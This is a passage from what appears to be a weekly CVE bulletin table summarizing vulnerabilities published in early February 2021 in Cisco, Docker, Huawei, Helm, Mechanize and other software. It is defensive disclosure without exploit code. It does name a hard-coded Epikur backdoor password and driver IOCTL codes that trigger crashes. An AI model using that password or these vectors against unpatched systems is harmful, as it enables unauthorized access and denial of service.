| cisco — ios_xr_software | A vulnerability in the IPv6 protocol handling of the management interfaces of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause an IPv6 flood on the management interface network of an affected device. The vulnerability exists because the software incorrectly forwards IPv6 packets that have an IPv6 node-local multicast group address destination and are received on the management interfaces. An attacker could exploit this vulnerability by connecting to the same network as the management interfaces and injecting IPv6 packets that have an IPv6 node-local multicast group address destination. A successful exploit could allow the attacker to cause an IPv6 flood on the corresponding network. Depending on the number of Cisco IOS XR Software nodes on that network segment, exploitation could cause excessive network traffic, resulting in network degradation or a denial of service (DoS) condition. | 2021-02-04 | not yet calculated | CVE-2021-1268 CISCO |
| cisco — ios_xr_software | Multiple vulnerabilities in the ingress packet processing function of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. | 2021-02-04 | not yet calculated | CVE-2021-1288 CISCO |
| cisco — ios_xr_software | Multiple vulnerabilities in the ingress packet processing function of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. | 2021-02-04 | not yet calculated | CVE-2021-1313 CISCO |
| cisco — ios_xr_software | A vulnerability in the IPv6 traffic processing of Cisco IOS XR Software and Cisco NX-OS Software for certain Cisco devices could allow an unauthenticated, remote attacker to bypass an IPv6 access control list (ACL) that is configured for an interface of an affected device. The vulnerability is due to improper processing of IPv6 traffic that is sent through an affected device. An attacker could exploit this vulnerability by sending crafted IPv6 packets that traverse the affected device. A successful exploit could allow the attacker to access resources that would typically be protected by the interface ACL. | 2021-02-04 | not yet calculated | CVE-2021-1389 CISCO |
| cisco — ios_xr_software | A vulnerability in the CLI parser of Cisco IOS XR Software could allow an authenticated, local attacker to view more information than their privileges allow. The vulnerability is due to insufficient application of restrictions during the execution of a specific command. An attacker could exploit this vulnerability by using a specific command at the command line. A successful exploit could allow the attacker to obtain sensitive information within the configuration that otherwise might not have been accessible beyond the privileges of the invoking user. | 2021-02-04 | not yet calculated | CVE-2021-1128 CISCO |
| cisco — managed_services_accelerator | A vulnerability in the REST API of Cisco Managed Services Accelerator (MSX) could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to the way that the affected software logs certain API requests. An attacker could exploit this vulnerability by sending a flood of crafted API requests to an affected device. A successful exploit could allow the attacker to cause a DoS condition on the affected device. | 2021-02-04 | not yet calculated | CVE-2021-1266 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to conduct directory traversal attacks and overwrite certain files that should be restricted on an affected system. These vulnerabilities are due to insufficient input validation. An attacker could exploit these vulnerabilities by using the web-based management interface to upload a file to a location on an affected device that they should not have access to. A successful exploit could allow the attacker to overwrite files on the file system of the affected device. | 2021-02-04 | not yet calculated | CVE-2021-1297 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. | 2021-02-04 | not yet calculated | CVE-2021-1295 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. | 2021-02-04 | not yet calculated | CVE-2021-1291 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. | 2021-02-04 | not yet calculated | CVE-2021-1290 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. | 2021-02-04 | not yet calculated | CVE-2021-1315 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. | 2021-02-04 | not yet calculated | CVE-2021-1314 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. | 2021-02-04 | not yet calculated | CVE-2021-1316 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to conduct directory traversal attacks and overwrite certain files that should be restricted on an affected system. These vulnerabilities are due to insufficient input validation. An attacker could exploit these vulnerabilities by using the web-based management interface to upload a file to a location on an affected device that they should not have access to. A successful exploit could allow the attacker to overwrite files on the file system of the affected device. | 2021-02-04 | not yet calculated | CVE-2021-1296 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. | 2021-02-04 | not yet calculated | CVE-2021-1294 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. | 2021-02-04 | not yet calculated | CVE-2021-1292 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. | 2021-02-04 | not yet calculated | CVE-2021-1289 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. | 2021-02-04 | not yet calculated | CVE-2021-1317 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. | 2021-02-04 | not yet calculated | CVE-2021-1318 CISCO |
| cisco — multiple_small_business_routers | Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. | 2021-02-04 | not yet calculated | CVE-2021-1293 CISCO |
| cisco — network_convergence_system_540_series_routers | Multiple vulnerabilities in Cisco Network Convergence System (NCS) 540 Series Routers, only when running Cisco IOS XR NCS540L software images, and Cisco IOS XR Software for the Cisco 8000 Series Routers could allow an authenticated, local attacker to execute unsigned code during the boot process on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. | 2021-02-04 | not yet calculated | CVE-2021-1244 CISCO |
| cisco — network_convergence_system_540_series_routers | Multiple vulnerabilities in Cisco Network Convergence System (NCS) 540 Series Routers, only when running Cisco IOS XR NCS540L software images, and Cisco IOS XR Software for the Cisco 8000 Series Routers could allow an authenticated, local attacker to execute unsigned code during the boot process on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. | 2021-02-04 | not yet calculated | CVE-2021-1136 CISCO |
| cisco — unified_computing_system | A vulnerability in the certificate registration process of Cisco Unified Computing System (UCS) Central Software could allow an authenticated, adjacent attacker to register a rogue Cisco Unified Computing System Manager (UCSM). This vulnerability is due to improper certificate validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to the registration API. A successful exploit could allow the attacker to register a rogue Cisco UCSM and gain access to Cisco UCS Central Software data and Cisco UCSM inventory data. | | | |
2021-02-04 |
not yet calculated |
CVE-2021-1354 CISCO |
cisco — webex_meetings_and_webex_meetings_server_software |
A vulnerability in the user interface of Cisco Webex Meetings and Cisco Webex Meetings Server Software could allow an authenticated, remote attacker to inject a hyperlink into a meeting invitation email. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by entering a URL into a field in the user interface. A successful exploit could allow the attacker to generate a Webex Meetings invitation email that contains a link to a destination of their choosing. Because this email is sent from a trusted source, the recipient may be more likely to click the link. |
2021-02-04 |
not yet calculated |
CVE-2021-1221 CISCO |
clustered_data — ontap
Clustered Data ONTAP versions prior to 9.3P20 and 9.5P15 are susceptible to a vulnerability which could allow unauthorized tenant users to discover the existence of data on other Storage Virtual Machines (SVMs). |
2021-02-03 |
not yet calculated |
CVE-2020-8588 CONFIRM |
clustered_data — ontap |
Clustered Data ONTAP versions prior to 9.3P20 and 9.5P15 are susceptible to a vulnerability which could allow unauthorized tenant users to discover the names of other Storage Virtual Machines (SVMs) and filenames on those SVMs. |
2021-02-03 |
not yet calculated |
CVE-2020-8589 CONFIRM |
com.squareup:connect — com.squareup:connect
This affects all versions of package com.squareup:connect. The method prepareDownloadFile creates a temporary file with the permission bits -rw-r--r-- on unix-like systems. On unix-like systems, the system temporary directory is shared between users. As such, the contents of the file downloaded by downloadFileFromResponse will be visible to all other users on the local system. As a workaround, set the system property java.io.tmpdir to a safe directory. Note: This version of the SDK is end of life and no longer maintained; please upgrade to the latest version. |
2021-02-03 |
not yet calculated |
CVE-2021-23331 CONFIRM CONFIRM |
docker — docker
In Docker before versions 9.03.15, 20.10.3 there is a vulnerability involving the --userns-remap option in which access to remapped root allows privilege escalation to real root. When using "--userns-remap", if the root user in the remapped namespace has access to the host filesystem they can modify files under "/var/lib/docker/<remapping>" that cause writing files with extended privileges. Versions 20.10.3 and 19.03.15 contain patches that prevent privilege escalation from the remapped user. |
2021-02-02 |
not yet calculated |
CVE-2021-21284 MISC MISC MISC MISC CONFIRM |
docker — docker
In Docker before versions 9.03.15, 20.10.3 there is a vulnerability in which pulling an intentionally malformed Docker image manifest crashes the dockerd daemon. Versions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing. |
2021-02-02 |
not yet calculated |
CVE-2021-21285 MISC MISC MISC MISC CONFIRM |
eclipse — californium |
In Eclipse Californium version 2.3.0 to 2.6.0, the certificate based (x509 and RPK) DTLS handshakes accidentally fail, because the DTLS server side sticks to a wrong internal state. That wrong internal state is set by a previous certificate based DTLS handshake failure with TLS parameter mismatch. The DTLS server side must be restarted to recover from this. This allows clients to force a DoS. |
2021-02-03 |
not yet calculated |
CVE-2020-27222 CONFIRM |
electric_coin_company — zcashd |
Electric Coin Company Zcashd before 2.1.1-1 allows attackers to trigger consensus failure and double spending. A valid chain could be incorrectly rejected because timestamp requirements on block headers were not properly enforced. |
2021-02-05 |
not yet calculated |
CVE-2020-8806 MISC |
electric_coin_company — zcashd |
In Electric Coin Company Zcashd before 2.1.1-1, the time offset between messages could be leveraged to obtain sensitive information about the relationship between a suspected victim’s address and an IP address, aka a timing side channel. |
2021-02-05 |
not yet calculated |
CVE-2020-8807 MISC |
elliptic — elliptic |
The package elliptic before 6.5.4 is vulnerable to Cryptographic Issues via the secp256k1 implementation in elliptic/ec/key.js. There is no check to confirm that the public key point passed into the derive function actually exists on the secp256k1 curve. This results in the potential for the private key used in this implementation to be revealed after a number of ECDH operations are performed. |
2021-02-02 |
not yet calculated |
CVE-2020-28498 MISC CONFIRM CONFIRM MISC |
epikur — epikur |
An issue was discovered in Epikur before 20.1.1. The Epikur server contains the checkPasswort() function that, upon user login, checks the submitted password against the user password’s MD5 hash stored in the database. It is also compared to a second MD5 hash, which is the same for every user (aka a “Backdoor Password” of 3p1kursupport). If the submitted password matches either one, access is granted. |
2021-02-05 |
not yet calculated |
CVE-2020-10539 MISC |
epikur — epikur |
An issue was discovered in Epikur before 20.1.1. A Glassfish 4.1 server with a default configuration is running on TCP port 4848. No password is required to access it with the administrator account. |
2021-02-05 |
not yet calculated |
CVE-2020-10537 MISC |
epikur — epikur |
An issue was discovered in Epikur before 20.1.1. It stores the secret passwords of the users as MD5 hashes in the database. MD5 can be brute-forced efficiently and should not be used for such purposes. Additionally, since no salt is used, rainbow tables can speed up the attack. |
2021-02-05 |
not yet calculated |
CVE-2020-10538 MISC |
epson — iprojection |
In Epson iProjection v2.30, the driver file (EMP_NSAU.sys) allows local users to cause a denial of service (BSOD) via crafted input to the virtual audio device driver with IOCTL 0x9C402402, 0x9C402406, or 0x9C40240A. \Device\EMPNSAUIO and \DosDevices\EMPNSAU are similarly affected. |
2021-02-05 |
not yet calculated |
CVE-2020-9014 MISC MISC MISC |
epson — iprojection |
In Epson iProjection v2.30, the driver file EMP_MPAU.sys allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9C402406 and IOCtl 0x9C40240A. (0x9C402402 has only a NULL pointer dereference.) This affects \Device\EMPMPAUIO and \DosDevices\EMPMPAU. |
2021-02-05 |
not yet calculated |
CVE-2020-9453 MISC MISC MISC |
freediskspace — freediskspace |
This affects all versions of package freediskspace. The vulnerability arises out of improper neutralization of arguments in line 71 of freediskspace.js. |
2021-02-02 |
not yet calculated |
CVE-2020-7775 MISC |
gitea — gitea |
Stack buffer overflow vulnerability in gitea 1.9.0 through 1.13.1 allows remote attackers to cause a denial of service (crash) via vectors related to a file path. |
2021-02-05 |
not yet calculated |
CVE-2021-3382 MISC |
gnome — evolution |
** DISPUTED ** GNOME Evolution through 3.38.3 produces a “Valid signature” message for an unknown identifier on a previously trusted key because Evolution does not retrieve enough information from the GnuPG API. NOTE: third parties dispute the significance of this issue, and dispute whether Evolution is the best place to change this behavior. |
2021-02-01 |
not yet calculated |
CVE-2021-3349 MISC MISC MISC |
gnome — multiple_products |
autoar-extractor.c in GNOME gnome-autoar through 0.2.4, as used by GNOME Shell, Nautilus, and other software, allows Directory Traversal during extraction because it lacks a check of whether a file’s parent is a symlink to a directory outside of the intended extraction location. |
2021-02-05 |
not yet calculated |
CVE-2020-36241 MISC MISC |
harbor — harbor |
In Harbor 2.0 before 2.0.5 and 2.1.x before 2.1.2 the catalog’s registry API is exposed on an unauthenticated path. |
2021-02-02 |
not yet calculated |
CVE-2020-29662 MISC |
hcl — digital_experience |
HCL Digital Experience 9.5 containers include vulnerabilities that could expose sensitive data to unauthorized parties via crafted requests. These affect containers only. These do not affect traditional on-premise installations. |
2021-02-02 |
not yet calculated |
CVE-2020-14255 CONFIRM |
hcl — digital_experience |
HCL Digital Experience 8.5, 9.0, and 9.5 exposes information about the server to unauthorized users. |
2021-02-02 |
not yet calculated |
CVE-2020-14221 CONFIRM |
hcl — digital_experience |
In Digital Experience 8.5, 9.0, and 9.5, WSRP consumer is vulnerable to cross-site scripting (XSS). |
2021-02-02 |
not yet calculated |
CVE-2020-4081 CONFIRM |
hcl — onetest_ui |
HCL OneTest UI V9.5, V10.0, and V10.1 does not perform authentication for functionality that either requires a provable user identity or consumes a significant amount of resources. |
2021-02-04 |
not yet calculated |
CVE-2020-14245 MISC |
helm — helm |
Helm is open-source software which is essentially "The Kubernetes Package Manager". Helm is a tool for managing Charts. Charts are packages of pre-configured Kubernetes resources. In Helm from version 3.0 and before version 3.5.2, there are a few cases where data loaded from potentially untrusted sources was not properly sanitized. When a SemVer in the `version` field of a chart is invalid, in some cases Helm allows the string to be used "as is" without sanitizing. Helm fails to properly sanitize some fields present on Helm repository `index.yaml` files. Helm does not properly sanitize some fields in the `plugin.yaml` file for plugins. In some cases, Helm does not properly sanitize the fields in the `Chart.yaml` file. By exploiting these attack vectors, core maintainers were able to send deceptive information to a terminal screen running the `helm` command, as well as obscure or alter information on the screen. In some cases, we could send codes that terminals used to execute higher-order logic, like clearing a terminal screen. Further, during evaluation, the Helm maintainers discovered a few other fields that were not properly sanitized when read out of repository index files. This fix remedies all such cases, and once again enforces SemVer2 policies on version fields. All users of Helm 3 should upgrade to the fixed version 3.5.2 or later. Those who use Helm as a library should verify that they either sanitize this data on their own, or use the proper Helm API calls to sanitize the data. |
2021-02-05 |
not yet calculated |
CVE-2021-21303 MISC MISC CONFIRM |
huawei — gauss100
There is a logic vulnerability in Huawei Gauss100 OLTP Product. An attacker with certain permissions could execute specific SQL statements to exploit this vulnerability. Due to insufficient security design, a successful exploit can cause abnormal service. Affected product versions include: ManageOne versions 6.5.1.1.B020, 6.5.1.1.B030, 6.5.1.1.B040, 6.5.1.SPC100.B050, 6.5.1.SPC101.B010, 6.5.1.SPC101.B040, 6.5.1.SPC200, 6.5.1.SPC200.B010, 6.5.1.SPC200.B030, 6.5.1.SPC200.B040, 6.5.1.SPC200.B050, 6.5.1.SPC200.B060, 6.5.1.SPC200.B070, 6.5.1RC1.B070, 6.5.1RC1.B080, 6.5.1RC2.B040, 6.5.1RC2.B050, 6.5.1RC2.B060, 6.5.1RC2.B070, 6.5.1RC2.B080, 6.5.1RC2.B090. |
2021-02-06 |
not yet calculated |
CVE-2021-22298 CONFIRM |
huawei — manageone |
There is a CSV injection vulnerability in ManageOne 8.0.1. An attacker with common privilege may exploit this vulnerability through some operations to inject CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject CSV files into the target device. |
2021-02-06 |
not yet calculated |
CVE-2020-9205 CONFIRM |
huawei — mate_30
There is a weak algorithm vulnerability in Mate 30 10.0.0.203(C00E201R7P2). The protection is insufficient for the modules that should be protected. Local attackers can exploit this vulnerability to affect the integrity of certain modules. |
2021-02-06 |
not yet calculated |
CVE-2021-22307 CONFIRM |
huawei — mate_30 |
Mate 30 10.0.0.203(C00E201R7P2) has a buffer overflow vulnerability. After obtaining the root permission, an attacker can exploit the vulnerability to cause a buffer overflow. |
2021-02-06 |
not yet calculated |
CVE-2021-22301 CONFIRM |
huawei — mate_30 |
There is an out-of-bound read vulnerability in Mate 30 10.0.0.182(C00E180R6P2). A module does not verify some input when dealing with messages. Attackers can exploit this vulnerability by sending malicious input through a specific module. This could cause an out-of-bound read, compromising normal service. |
2021-02-06 |
not yet calculated |
CVE-2021-22306 CONFIRM |
huawei — mate_30 |
There is a buffer overflow vulnerability in Mate 30 10.1.0.126(C00E125R5P3). A module does not verify some input when dealing with messages. Attackers can exploit this vulnerability by sending malicious input through a specific module. This could cause a buffer overflow, compromising normal service. |
2021-02-06 |
not yet calculated |
CVE-2021-22305 CONFIRM |
huawei — multiple_products |
There is a denial of service (DoS) vulnerability in eCNS280 versions V100R005C00, V100R005C10. Due to a design defect, remote unauthorized attackers can send a large number of specific messages to affected devices, causing system resource exhaustion and web application DoS. |
2021-02-06 |
not yet calculated |
CVE-2021-22292 CONFIRM |
huawei — multiple_products |
Some Huawei products have an inconsistent interpretation of HTTP requests vulnerability. Attackers can exploit this vulnerability to cause an information leak. Affected product versions include: CampusInsight versions V100R019C10; ManageOne versions 6.5.1.1, 6.5.1.SPC100, 6.5.1.SPC200, 6.5.1RC1, 6.5.1RC2, 8.0.RC2; Taurus-AL00A versions 10.0.0.1(C00E1R1P1). |
2021-02-06 |
not yet calculated |
CVE-2021-22293 CONFIRM |
huawei — multiple_products |
There is a local privilege escalation vulnerability in some Huawei products. A local, authenticated attacker could craft specific commands to exploit this vulnerability. Successful exploitation may allow the attacker to obtain a higher privilege. Affected product versions include: ManageOne versions 6.5.0,6.5.0.SPC100.B210,6.5.1.1.B010,6.5.1.1.B020,6.5.1.1.B030,6.5.1.1.B040,6.5.1.SPC100.B050,6.5.1.SPC101.B010,6.5.1.SPC101.B040,6.5.1.SPC200,6.5.1.SPC200.B010,6.5.1.SPC200.B030,6.5.1.SPC200.B040,6.5.1.SPC200.B050,6.5.1.SPC200.B060,6.5.1.SPC200.B070,6.5.1RC1.B060,6.5.1RC2.B020,6.5.1RC2.B030,6.5.1RC2.B040,6.5.1RC2.B050,6.5.1RC2.B060,6.5.1RC2.B070,6.5.1RC2.B080,6.5.1RC2.B090,6.5.RC2.B050,8.0.0,8.0.0-LCND81,8.0.0.SPC100,8.0.1,8.0.RC2,8.0.RC3,8.0.RC3.B041,8.0.RC3.SPC100; NFV_FusionSphere versions 6.5.1.SPC23,8.0.0.SPC12; SMC2.0 versions V600R019C00,V600R019C10; iMaster MAE-M versions MAE-TOOL(FusionSphereBasicTemplate_Euler_X86)V100R020C10SPC220. |
2021-02-06 |
not yet calculated |
CVE-2021-22299 CONFIRM |
huawei — sound_x_product |
There is an insufficient integrity check vulnerability in Huawei Sound X Product. The system does not check certain software packages' integrity sufficiently. Successful exploit could allow an attacker to load a crafted software package onto the device. Affected product versions include: AIS-BW80H-00 versions 9.0.3.1(H100SP13C00),9.0.3.1(H100SP18C00),9.0.3.1(H100SP3C00),9.0.3.1(H100SP9C00),9.0.3.2(H100SP1C00),9.0.3.2(H100SP2C00),9.0.3.2(H100SP5C00),9.0.3.2(H100SP8C00),9.0.3.3(H100SP1C00). |
2021-02-06 |
not yet calculated |
CVE-2020-9118 CONFIRM |
huawei — taurus-al00a_smartphones
There is a use after free vulnerability in Taurus-AL00A 10.0.0.1(C00E1R1P1). A module may refer to some memory after it has been freed while dealing with some messages. Attackers can exploit this vulnerability by sending a specific message to the affected module. This may lead to a module crash, compromising normal service. |
2021-02-06 |
not yet calculated |
CVE-2021-22304 CONFIRM |
huawei — taurus-al00a_smartphones |
There is an out-of-bound read vulnerability in Taurus-AL00A 10.0.0.1(C00E1R1P1). A module does not verify some input. Attackers can exploit this vulnerability by sending malicious input through a specific app. This could cause an out-of-bound read, compromising normal service. |
2021-02-06 |
not yet calculated |
CVE-2021-22302 MISC |
huawei — taurus-al00a_smartphones |
There is a pointer double free vulnerability in Taurus-AL00A 10.0.0.1(C00E1R1P1). There is a lack of multi-thread protection when a function is called. Attackers can exploit this vulnerability by performing a malicious operation to cause a pointer double free. This may lead to a module crash, compromising normal service. |
2021-02-06 |
not yet calculated |
CVE-2021-22303 CONFIRM |
ibm — powerha |
IBM PowerHA 7.2 could allow a local attacker to obtain sensitive information from temporary directories after a discovery failure occurs. IBM X-Force ID: 189969. |
2021-02-05 |
not yet calculated |
CVE-2020-4832 XF CONFIRM |
imagemagick — magickcore/gem
A flaw was found in ImageMagick in MagickCore/gem.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of math division by zero. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.10-56. |
2021-02-06 |
not yet calculated |
CVE-2021-20176 MISC |
intel — bluez |
Improper buffer restrictions in BlueZ may allow an unauthenticated user to potentially enable denial of service via adjacent access. This affects all Linux kernel versions that support BlueZ. |
2021-02-02 |
not yet calculated |
CVE-2020-24490 CONFIRM |
intel — celeron_processor_4000_series |
Out of bound read in BIOS firmware for 8th, 9th Generation Intel(R) Core(TM), Intel(R) Celeron(R) Processor 4000 Series Processors may allow an unauthenticated user to potentially enable elevation of privilege or denial of service via local access. |
2021-02-02 |
not yet calculated |
CVE-2020-8672 CONFIRM |
iobit — advanced_systemcare |
The AscRegistryFilter.sys kernel driver in IObit Advanced SystemCare 13.2 allows an unprivileged user to send an IOCTL to the device driver. If the user provides a NULL entry for the dwIoControlCode parameter, a kernel panic (aka BSOD) follows. The IOCTL codes can be found in the dispatch function: 0x8001E000, 0x8001E004, 0x8001E008, 0x8001E00C, 0x8001E010, 0x8001E014, 0x8001E020, 0x8001E024, 0x8001E040, 0x8001E044, and 0x8001E048. \DosDevices\AscRegistryFilter and \Device\AscRegistryFilter are affected. |
2021-02-05 |
not yet calculated |
CVE-2020-10234 MISC MISC MISC |
jenzabar — jenzabar |
Jenzabar 9.2.x through 9.2.2 allows /ics?tool=search&query= XSS. |
2021-02-06 |
not yet calculated |
CVE-2021-26723 MISC MISC |
jetbrains — code_with_me |
In JetBrains Code With Me before 2020.3, an attacker on the local network, knowing a session ID, could get access to the encrypted traffic. |
2021-02-03 |
not yet calculated |
CVE-2021-25755 MISC MISC |
jetbrains — hub |
In JetBrains Hub before 2020.1.12629, an authenticated user can delete 2FA settings of any other user. |
2021-02-03 |
not yet calculated |
CVE-2021-25759 MISC MISC |
jetbrains — ktor |
In JetBrains Ktor before 1.5.0, a birthday attack on SessionStorage key was possible. |
2021-02-03 |
not yet calculated |
CVE-2021-25761 MISC MISC |
jetbrains — ktor |
In JetBrains Ktor before 1.4.3, HTTP Request Smuggling was possible. |
2021-02-03 |
not yet calculated |
CVE-2021-25762 MISC MISC |
jetbrains — youtrack |
In JetBrains YouTrack before 2020.4.4701, improper resource access checks were made. |
2021-02-03 |
not yet calculated |
CVE-2021-25766 MISC MISC |
lg — multiple_mobile_devices |
An issue was discovered on LG mobile devices with Android OS 8.0, 8.1, 9.0, and 10 software. In preloaded applications, the HostnameVerified default is mishandled. The LG ID is LVE-SMP-200029 (February 2021). |
2021-02-04 |
not yet calculated |
CVE-2021-26687 MISC |
lg — wing_mobile_devices |
An issue was discovered on LG Wing mobile devices with Android OS 10 software. The biometric sensor has weak security properties. The LG ID is LVE-SMP-200030 (February 2021). |
2021-02-04 |
not yet calculated |
CVE-2021-26688 MISC |
linkedin — oncall |
LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the “No results found for” message in the search bar. |
2021-02-05 |
not yet calculated |
CVE-2021-26722 MISC |
linux — linux_kernel |
A local privilege escalation was discovered in the Linux kernel before 5.10.13. Multiple race conditions in the AF_VSOCK implementation are caused by wrong locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced in the commits that added VSOCK multi-transport support. |
2021-02-05 |
not yet calculated |
CVE-2021-26708 MLIST MISC MISC MISC |
loklak — loklak |
loklak is an open-source server application which is able to collect messages from various sources, including Twitter. The server contains a search index and a peer-to-peer index sharing interface. All messages are stored in an elasticsearch index. In loklak less than or equal to commit 5f48476, a path traversal vulnerability exists. Insufficient input validation in the APIs exposed by the loklak server allowed a directory traversal vulnerability. Any admin configuration and files readable by the app available on the hosted file system can be retrieved by the attacker. Furthermore, user-controlled content could be written to any admin config and files readable by the application. This has been patched in commit 50dd692. Users will need to upgrade their hosted instances of loklak to not be vulnerable to this exploit. |
2021-02-02 |
not yet calculated |
CVE-2020-15097 MISC CONFIRM |
max_secure — max_spyware_detector |
In Max Secure Max Spyware Detector 1.0.0.044, the driver file (MaxProc64.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x2200019. (This also extends to the various other products from Max Secure that include MaxProc64.sys.) |
2021-02-05 |
not yet calculated |
CVE-2020-12122 MISC MISC MISC |
mechanize — mechanize |
Mechanize is an open-source ruby library that makes automated web interaction easy. In Mechanize from version 2.0.0 and before version 2.7.7 there is a command injection vulnerability. Affected versions of mechanize allow for OS commands to be injected using several classes’ methods which implicitly use Ruby’s Kernel.open method. Exploitation is possible only if untrusted input is used as a local filename and passed to any of these calls: Mechanize::CookieJar#load, Mechanize::CookieJar#save_as, Mechanize#download, Mechanize::Download#save, Mechanize::File#save, and Mechanize::FileResponse#read_body. This is fixed in version 2.7.7. |
2021-02-02 |
not yet calculated |
